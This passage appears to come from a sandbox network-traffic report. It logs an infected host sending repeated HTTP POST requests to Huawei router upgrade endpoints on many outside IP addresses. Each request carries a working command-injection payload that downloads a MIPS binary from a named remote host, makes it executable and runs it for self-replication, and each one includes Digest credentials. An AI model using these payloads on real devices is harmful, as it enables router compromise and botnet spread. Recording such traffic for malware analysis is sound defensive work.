69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  880192.168.2.1342310197.32.201.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.382910013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  881192.168.2.1347266157.28.84.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.382946014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  882192.168.2.134110041.248.172.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.382952929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  883192.168.2.133796241.245.208.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383270025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  884192.168.2.1359978197.231.60.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383284092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  885192.168.2.1336266157.99.170.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383291960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  886192.168.2.1357800197.69.195.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383301020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  887192.168.2.135438641.214.50.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383310080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  888192.168.2.1356580197.234.90.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383332968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  889192.168.2.1335108106.32.66.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383342028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  890192.168.2.1338180157.45.6.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383342028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
